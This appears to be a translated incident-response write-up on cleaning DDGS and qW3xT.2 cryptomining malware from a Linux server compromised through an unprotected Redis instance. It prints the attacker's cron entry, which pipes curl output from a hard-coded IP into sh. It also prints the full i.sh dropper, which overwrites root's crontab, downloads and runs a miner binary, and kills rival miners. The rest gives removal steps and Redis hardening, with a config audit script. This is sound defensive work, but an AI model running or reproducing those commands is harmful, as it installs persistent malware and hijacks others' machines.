Preface

With the frenzy of speculation in virtual currencies, mining malware has become one of the attack methods criminals use most often. Whoever spreads it can use personal computers or servers to mine. The typical symptoms are high CPU usage, a sudden drop in free space on the C drive, higher machine temperature, louder fan noise and similar problems. This article mainly describes how to deal with the DDGS and qW3xT.2 mining malware implanted on Linux. Let's take a look at the details.

Phenomenon after being invaded:

Two abnormal processes, qW3xT.2 and ddgs, were found. They consumed a lot of CPU and reappeared a while after being killed.

After killing these two abnormal processes, the following processes were seen again after a while:

First, no scheduled script was found in /etc/sysconfig/crontab; running crontab -e revealed the scheduled task:

```
*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
```

I checked that 149.56.106.215 is in the United States, and the content of the i.sh script is as follows:

```sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

# Persistence: overwrite root's crontab so i.sh is fetched and run again every 15 minutes
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

# Payload: download the ddgs binary for this CPU architecture into /tmp and start it
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

# Kill competing miners (processes tied to other mining pools) so this one keeps the CPU
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
```

Treatment method:

1. With crontab -e, delete the entry `*/5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh`
2. Remove the password-free login keys the attacker added to /root/.ssh/authorized_keys
3. Change the Redis password
4. Change the root password and the passwords of the other login accounts

Safety tips:

1. Configure the bind option to restrict which IPs may connect to the Redis server, change the default Redis port 6379, and enable authentication (AUTH) by setting a password. Note that the password is stored in plain text in the Redis configuration file.
2. Use the rename-command configuration item to rename the CONFIG command (for example to "RENAME_CONFIG"), so that even with unauthorized access it is harder for an attacker to use the config command.
3. If possible, block external network access to Redis in the firewall.

Intrusion method:

After collecting the relevant information, we learned that the attacker got in through Redis: no password had been set, or the password was too simple.
For the specific methods, refer to https://www.jb51.net/article/147375.htm

The Redis password can be changed as follows:

```
redis-cli -h 127.0.0.1 -p 6379
config get requirepass                  ## get the current password
config set requirepass "yourpassword"   ## set the current password
```

After the service is restarted this is reset to the default, i.e. no password. To make it permanent, open the Redis configuration file redis.conf, find the requirepass value and change the password as follows:

```
requirepass yourpassword   ## note: there must be no space before the line
```
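As an added example (not from the article), here is a small shell audit of redis.conf against the safety tips above: requirepass set, bind restricted, a non-default port, and the CONFIG command renamed. The two configuration files are constructed samples, and "yourpassword" is a placeholder as in the article.

```shell
#!/bin/sh
# Added example (not from the original article): check a redis.conf against the
# hardening points listed in the safety tips (bind, non-default port, requirepass,
# renamed CONFIG command). Both configuration files below are constructed samples.
# Value of an active (not commented-out) directive; the last occurrence wins, as in Redis.
conf_value() {
    grep -E "^[[:space:]]*$2[[:space:]]" "$1" | awk '{print $2}' | tail -n 1
}
# One line per weakness found; prints nothing for a hardened file.
audit_redis_conf() {
    f="$1"
    [ -n "$(conf_value "$f" requirepass)" ] ||
        echo "requirepass not set: anyone who can reach the port has full access"
    b=$(conf_value "$f" bind)
    if [ -z "$b" ] || [ "$b" = "0.0.0.0" ]; then
        echo "bind missing or 0.0.0.0: Redis listens on every interface"
    fi
    p=$(conf_value "$f" port)
    if [ -z "$p" ] || [ "$p" = "6379" ]; then
        echo "port is the default 6379: found immediately by mass scanners"
    fi
    grep -qiE '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$f" ||
        echo "CONFIG not renamed: easier for an attacker with access to abuse the config command"
}
# Number of findings (0 means every tip from the article is in place).
count_findings() {
    audit_redis_conf "$1" | wc -l | tr -d ' '
}

# Constructed weak config resembling what got this host compromised
# (the commented-out requirepass line is ignored by Redis, so there is no password).
WEAK=$(mktemp)
cat > "$WEAK" <<'EOF'
bind 0.0.0.0
port 6379
# requirepass foobared
EOF

# Constructed hardened config applying the safety tips (placeholder password).
HARD=$(mktemp)
cat > "$HARD" <<'EOF'
bind 127.0.0.1
port 16379
requirepass yourpassword
rename-command CONFIG "RENAME_CONFIG"
EOF

echo "weak config: $(count_findings "$WEAK") findings"
audit_redis_conf "$WEAK"
echo "hardened config: $(count_findings "$HARD") findings"
```

Point `audit_redis_conf` at the real redis.conf to check a live server's file.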